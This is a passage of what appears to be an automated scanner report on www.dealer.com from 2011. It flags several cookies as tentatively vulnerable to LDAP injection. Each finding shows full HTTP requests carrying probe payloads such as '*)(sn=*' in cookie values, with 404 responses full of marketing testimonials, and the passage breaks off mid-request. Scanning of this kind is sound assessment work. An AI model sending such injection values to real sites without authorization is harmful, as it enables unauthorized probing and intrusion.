<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>What I like best about SocialRelationship Manager&#8482; is it enables me as a dealer to both listen and to speak to my audience and customers on a platform that is so simple to use.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
...[SNIP]...

1.3. http://www.dealer.com/products/inventory-marketing/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/lead-management/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/inventory-marketing/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/lead-management/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/lead-management/ cookie. The two requests produced different responses, which may indicate that the input is incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/inventory-marketing/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/inventory-marketing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=*)(sn=*; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002863; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.46.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20215
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:26:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003618; expires=Mon, 16-Apr-2012 01:26:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We've incorporated more of Dealer.com's products because everything we put in place has worked. I really feel like we've got a partner in Dealer.com. </p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/produc
...[SNIP]...

Request 2

GET /products/inventory-marketing/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/inventory-marketing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=*)!(sn=*; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002863; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.46.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20189
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003619; expires=Mon, 16-Apr-2012 01:26:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spo
...[SNIP]...

1.4. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif [exp_last_visit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/loading.gif

Issue detail

The exp_last_visit cookie appears to be vulnerable to LDAP injection attacks.

The payloads 714ccbf8941beef9)(sn=* and 714ccbf8941beef9)!(sn=* were each submitted in the exp_last_visit cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=714ccbf8941beef9)(sn=*; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19951
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:15:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002958; expires=Mon, 16-Apr-2012 01:15:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=714ccbf8941beef9)!(sn=*; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20054
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:15:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002959; expires=Mon, 16-Apr-2012 01:15:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversio
...[SNIP]...

1.5. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/ cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=*)(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20312
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003738; expires=Mon, 16-Apr-2012 01:28:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I don't care who your website provider is, if it's not Dealer.com you need to at least take a look at them. I give them my absolute whole-hearted endorsement. I put my name on it. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>In the 2 years that we have been with Dealer.com, our rankings have drastically improved, and our lead volume has gone up at least 40%.</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Mark
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; 